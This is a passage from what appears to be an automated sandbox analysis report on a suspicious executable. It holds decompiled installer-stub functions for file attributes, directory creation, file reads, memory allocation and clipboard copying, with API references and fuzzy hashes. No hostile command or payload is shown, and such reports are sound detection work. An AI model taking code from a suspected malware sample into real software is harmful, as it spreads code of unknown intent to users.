                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\PQMW0W5h3X.exe,80000000,00000003), ref: 00405873
                                                                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 415043291-0
                                                                                                                          • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                          • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                                                          • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                          • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                                          0x00405854
                                                                                                                          0x0040585d
                                                                                                                          0x00000000
                                                                                                                          0x00405866
                                                                                                                          0x0040586c

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                          • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                                                                                          • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                          • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                          0x004053c9
                                                                                                                          0x004053d1
                                                                                                                          0x00000000
                                                                                                                          0x004053d7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                                                                                          • GetLastError.KERNEL32 ref: 004053D7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1375471231-0
                                                                                                                          • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                          • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                                                                                          • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                          • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                          0x00403085
                                                                                                                          0x00403098
                                                                                                                          0x004030a0
                                                                                                                          0x00000000
                                                                                                                          0x004030a7
                                                                                                                          0x00000000
                                                                                                                          0x004030a9

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                          • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                                                                                          • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                          • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                          0x004030c1
                                                                                                                          0x004030c7

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,?), ref: 004030C1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                          • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                                          • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                          • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001000, Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E10001000(intOrPtr _a8, intOrPtr _a16) {
				long _t5;
				void* _t6;

				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				_t5 = E100017FE();
				if(_t5 != 0) {
					_t6 = GlobalAlloc(0x40, _t5); // executed
					_push(_t6);
				} else {
					_push(_t5);
				}
				return E10001825();
			}





                                                                                                                          0x10001004
                                                                                                                          0x1000100d
                                                                                                                          0x10001012
                                                                                                                          0x10001019
                                                                                                                          0x10001021
                                                                                                                          0x10001027
                                                                                                                          0x1000101b
                                                                                                                          0x1000101b
                                                                                                                          0x1000101b
                                                                                                                          0x1000102e

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 10001021
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
                                                                                                                          • Opcode ID: 61514a1c763785071cf50fc6d6c14fbf39c44340d08e07733eb688f9b32edf2f
                                                                                                                          • Instruction ID: 4bed1d4784c55e4e126bbf2fc3d550e86f6dc06da7f694ddde7ac900ba0193af
                                                                                                                          • Opcode Fuzzy Hash: 61514a1c763785071cf50fc6d6c14fbf39c44340d08e07733eb688f9b32edf2f
                                                                                                                          • Instruction Fuzzy Hash: DFD05EF4604381EBF300DF70C88994B37E8EB4C2D0F118819FA45D2118DA74D8404F20
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001541, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E10001541() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x10004058); // executed
				return _t1;
			}




                                                                                                                          0x10001549
                                                                                                                          0x1000154f

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.335998522.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.335961527.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336004505.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.336018222.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
                                                                                                                          • Opcode ID: 8dec1988ff7a2beb4b9117a4c8d893658d09db9a8f74ba49e322f4002f413595
                                                                                                                          • Instruction ID: 4dafbad5e8ab0305fa889b032d762fa57f52ac67aacfd2269760c410bf251020
                                                                                                                          • Opcode Fuzzy Hash: 8dec1988ff7a2beb4b9117a4c8d893658d09db9a8f74ba49e322f4002f413595
                                                                                                                          • Instruction Fuzzy Hash: 46A002B2941560DBFE42ABE08D9EF5B3B25E748781F02C040E719641BCCA754064DF29
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420538;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42370c == _t149) {
							ShowWindow( *0x423f48, 8);
							if( *0x423fcc == _t149) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                                                          0x00404fcb
                                                                                                                          0x00404fd1
                                                                                                                          0x00404fda
                                                                                                                          0x00404fdd
                                                                                                                          0x00405175
                                                                                                                          0x00405199
                                                                                                                          0x00405199
                                                                                                                          0x004051ac
                                                                                                                          0x004051ca
                                                                                                                          0x004051d1
                                                                                                                          0x00405228
                                                                                                                          0x0040522c
                                                                                                                          0x00000000
                                                                                                                          0x00405233
                                                                                                                          0x0040523b
                                                                                                                          0x00405243
                                                                                                                          0x00405246
                                                                                                                          0x0040533f
                                                                                                                          0x00000000
                                                                                                                          0x0040533f
                                                                                                                          0x00405255
                                                                                                                          0x00405261
                                                                                                                          0x00405267
                                                                                                                          0x0040526d
                                                                                                                          0x00405282
                                                                                                                          0x00405288
                                                                                                                          0x0040526f
                                                                                                                          0x00405274
                                                                                                                          0x0040527a
                                                                                                                          0x0040527d
                                                                                                                          0x0040527d
                                                                                                                          0x00405298
                                                                                                                          0x004052a0
                                                                                                                          0x004052a3
                                                                                                                          0x004052ac
                                                                                                                          0x004052af
                                                                                                                          0x004052b6
                                                                                                                          0x004052bd
                                                                                                                          0x004052c5
                                                                                                                          0x004052c5
                                                                                                                          0x004052dc
                                                                                                                          0x004052dc
                                                                                                                          0x004052e3
                                                                                                                          0x004052e9
                                                                                                                          0x004052f2
                                                                                                                          0x004052f9
                                                                                                                          0x00405302
                                                                                                                          0x00405304
                                                                                                                          0x00405307
                                                                                                                          0x00405316
                                                                                                                          0x00405318
                                                                                                                          0x0040531e
                                                                                                                          0x0040531f
                                                                                                                          0x00405320
                                                                                                                          0x00405328
                                                                                                                          0x00405333
                                                                                                                          0x00405339
                                                                                                                          0x00405339
                                                                                                                          0x00000000
                                                                                                                          0x004052a3
                                                                                                                          0x0040522c
                                                                                                                          0x004051d9
                                                                                                                          0x00405209
                                                                                                                          0x00405211
                                                                                                                          0x0040521c
                                                                                                                          0x0040521c
                                                                                                                          0x00405223
                                                                                                                          0x00000000
                                                                                                                          0x00405223
                                                                                                                          0x004051dd
                                                                                                                          0x004051e7
                                                                                                                          0x00000000
                                                                                                                          0x004051ae
                                                                                                                          0x004051b4
                                                                                                                          0x004051ec
                                                                                                                          0x00000000
                                                                                                                          0x004051f5
                                                                                                                          0x004051bd
                                                                                                                          0x004051c2
                                                                                                                          0x004051c5
                                                                                                                          0x00000000
                                                                                                                          0x004051c5
                                                                                                                          0x004051ac
                                                                                                                          0x00404fe3
                                                                                                                          0x00404fe7
                                                                                                                          0x00404ff0
                                                                                                                          0x00404ff7
                                                                                                                          0x00404ffa
                                                                                                                          0x00404ffd
                                                                                                                          0x00405000
                                                                                                                          0x00405001
                                                                                                                          0x00405002
                                                                                                                          0x0040501b
                                                                                                                          0x0040501e
                                                                                                                          0x00405028
                                                                                                                          0x00405037
                                                                                                                          0x0040503f
                                                                                                                          0x00405047
                                                                                                                          0x0040504c
                                                                                                                          0x0040504f
                                                                                                                          0x0040505b
                                                                                                                          0x00405064
                                                                                                                          0x0040506d
                                                                                                                          0x00405090
                                                                                                                          0x00405096
                                                                                                                          0x004050a7
                                                                                                                          0x004050ac
                                                                                                                          0x004050ba
                                                                                                                          0x004050c8
                                                                                                                          0x004050c8
                                                                                                                          0x004050cd
                                                                                                                          0x004050db
                                                                                                                          0x004050db
                                                                                                                          0x004050e0
                                                                                                                          0x004050e3
                                                                                                                          0x004050e8
                                                                                                                          0x004050f4
                                                                                                                          0x004050fd
                                                                                                                          0x0040510a
                                                                                                                          0x00405119
                                                                                                                          0x0040510c
                                                                                                                          0x00405111
                                                                                                                          0x00405111
                                                                                                                          0x00405125
                                                                                                                          0x00405125
                                                                                                                          0x00405139
                                                                                                                          0x00405142
                                                                                                                          0x0040514b
                                                                                                                          0x0040515b
                                                                                                                          0x00405167
                                                                                                                          0x00405167
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00405021
                                                                                                                          • GetDlgItem.USER32 ref: 00405030
                                                                                                                          • GetClientRect.USER32 ref: 0040506D
                                                                                                                          • GetSystemMetrics.USER32 ref: 00405075
                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405111
                                                                                                                          • GetDlgItem.USER32 ref: 00405132
                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                                                                                                          • GetDlgItem.USER32 ref: 0040503F
                                                                                                                            • Part of subcall function 00403E89: SendMessageA.USER32(00000028,?,00000001,00403CBA), ref: 00403E97
                                                                                                                          • GetDlgItem.USER32 ref: 00405184
                                                                                                                          • CreateThread.KERNEL32 ref: 00405192
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004051BD
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004051C2
                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405209
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040523B
                                                                                                                          • CreatePopupMenu.USER32 ref: 0040524C
                                                                                                                          • AppendMenuA.USER32 ref: 00405261
                                                                                                                          • GetWindowRect.USER32 ref: 00405274
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004052E3
                                                                                                                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                                                                                          • GlobalLock.KERNEL32 ref: 004052FC
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                                                                                          • SetClipboardData.USER32 ref: 00405333
                                                                                                                          • CloseClipboard.USER32 ref: 00405339
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {
                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                          • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                                                                          • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                                                                                          • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                                                                                          • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423f50 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
